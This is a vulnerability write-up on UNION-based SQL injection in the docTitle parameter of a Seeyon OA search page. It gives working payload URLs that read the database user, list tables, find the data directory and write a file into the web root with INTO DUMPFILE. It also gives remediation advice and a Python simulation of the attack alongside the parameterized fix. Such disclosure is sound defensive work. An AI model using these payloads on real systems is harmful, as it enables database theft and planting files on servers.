SQL injection through the docTitle parameter of search_result.jsp
The parameter is concatenated into the SQL statement unescaped. A single quote closes the string, "and 1=2" empties the original result set, a UNION padded to the five columns of the original SELECT (hence 2,3,4,5) appends attacker-chosen rows, and %23 (a URL-encoded "#") comments out the rest of the statement. /**/ is used in place of every space so that a filter that only strips spaces does not break the payload. Read the database user:
http://xxxxxx.com/yyoa/oaSearch/search_result.jsp?docType=Collaborative Information&docTitle=1'/**/and/**/1=2/**/union/**/all/**/select/**/user(),2,3,4,5%23&goal=1&perId=0&startTime=&endTime=&keyword=&searchArea=notArc
Enumerate table names (no schema filter, so tables from every database are concatenated; group_concat output is cut off at group_concat_max_len, 1024 bytes by default, so add a WHERE table_schema=... clause if the list is truncated):
http://xxxxxx.com/yyoa/oaSearch/search_result.jsp?docType=Collaborative Information&docTitle=test'/**/and/**/1=2/**/union/**/all/**/select/**/group_concat(table_name),2,3,4,5/**/from/**/information_schema.tables%23&goal=1&perId=0&startTime=&endTime=&keyword=&searchArea=notArc
Because the product ships as a bundled package with a fixed installation layout, the web root can be derived from the MySQL data directory (@@datadir):
http://xxxxxx.com/yyoa/oaSearch/search_result.jsp?docType=Collaborative Information&docTitle=test'/**/and/**/1=2/**/union/**/all/**/select/**/@@datadir,2,3,4,5%23&goal=1&perId=0&startTime=&endTime=&keyword=&searchArea=notArc
Combining that with the OA installation layout documented online gives the web root:
D:\UFseeyon\OA\tomcat\webapps\yyoa
Write a file straight into the web root with INTO DUMPFILE. This requires the FILE privilege on the injected database account and a MySQL service that can write to the Tomcat webapps directory; LIMIT 1 is needed because DUMPFILE refuses to write more than one row, and all five selected columns are written back-to-back without separators, so the file below contains "test2345". The content here is only a placeholder that proves the write:
http://xxxxxx.com/yyoa/oaSearch/search_result.jsp?docType=Collaborative Information&docTitle=test'/**/and/**/1=2/**/union/**/all/**/select/**/'test',2,3,4,5/**/into/**/dumpfile/**/'d:/UFseeyon/OA/tomcat/webapps/yyoa/test.jsp'/**/from/**/mysql.user/**/limit/**/1%23&goal=1&perId=0&startTime=&endTime=&keyword=&searchArea=notArc
Solution:
Filtering dangerous characters alone is not enough: the payload above already replaces spaces with /**/ to slip past that kind of filter. Pass docTitle (and the other search parameters) to the database as bind parameters of a PreparedStatement instead of concatenating them into the SQL string. Independently, the file write only works because the application's database account holds the FILE privilege and the MySQL service can write into the web root: revoke FILE from that account and set secure_file_priv, so that even a residual injection cannot drop a JSP into webapps.
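As an added example (not code from the OA product or from this write-up), the following simulates the injection steps above and the parameterized fix against an in-memory SQLite table. The real query and table schema behind search_result.jsp are not on the page, so a five-column table and a WHERE title = '...' query shape are assumed; MySQL-only tokens are swapped for SQLite equivalents (the "#" / %23 comment becomes "--", user() becomes sqlite_version(), information_schema.tables becomes sqlite_master), and the INTO DUMPFILE step has no SQLite counterpart and is not simulated.

```python
"""UNION injection through docTitle and the bind-parameter fix, simulated.

Added example; not code from the vulnerable OA product. The document table
and its five columns are assumed (the payload pads the UNION to five values),
and MySQL-only tokens are replaced by SQLite equivalents so this runs offline.
"""
import sqlite3

COLUMN_COUNT = 5  # assumed from the page's "select user(),2,3,4,5"


def setup_db():
    """Constructed stand-in for the document table that the JSP searches."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE docs(id INTEGER, title TEXT, author TEXT,"
                 " body TEXT, created TEXT)")
    conn.executemany("INSERT INTO docs VALUES (?, ?, ?, ?, ?)", [
        (1, "Q3 budget", "alice", "numbers", "2014-01-01"),
        (2, "test", "bob", "nothing", "2014-02-01"),
    ])
    return conn


def build_payload(expr, from_clause="", columns=COLUMN_COUNT, comment="--"):
    """Reproduce the page's payload shape: close the string literal, empty
    the original row set with 1=2, UNION in attacker-chosen columns, then
    comment out the rest of the statement. /**/ replaces every space, as on
    the page, so a filter that only strips spaces does not break it.
    The page uses '#' (URL-encoded %23) as the comment for MySQL; SQLite
    only understands '--', hence the default here."""
    cols = [expr] + [str(i) for i in range(2, columns + 1)]
    sql = "union/**/all/**/select/**/" + ",".join(cols)
    if from_clause:
        sql += "/**/from/**/" + from_clause
    return "test'/**/and/**/1=2/**/" + sql + comment


def search_vulnerable(conn, doc_title):
    """Query built by string concatenation: the assumed bug in the JSP."""
    sql = ("SELECT id, title, author, body, created FROM docs"
           " WHERE title = '" + doc_title + "'")
    return conn.execute(sql).fetchall()


def search_fixed(conn, doc_title):
    """Same query with a bind parameter (the PreparedStatement equivalent):
    the value is sent as data and can never become part of the SQL."""
    sql = ("SELECT id, title, author, body, created FROM docs"
           " WHERE title = ?")
    return conn.execute(sql, (doc_title,)).fetchall()


if __name__ == "__main__":
    db = setup_db()
    leak = build_payload("sqlite_version()")                       # page step 1 (user())
    tables = build_payload("group_concat(name)", "sqlite_master")  # page step 2
    print(search_vulnerable(db, leak))    # one row: the server version in column 1
    print(search_vulnerable(db, tables))  # one row: 'docs' in column 1
    print(search_fixed(db, leak))         # [] : the payload is just an unmatched title
    print(search_fixed(db, "test"))       # the genuine document titled "test"
```

Run it as a script to see the two injected result sets next to the empty result the parameterized query returns for the same payload; change COLUMN_COUNT to 4 and the vulnerable query fails with a column-count mismatch, which is exactly the signal an attacker uses to find the padding 2,3,4,5 in the first place.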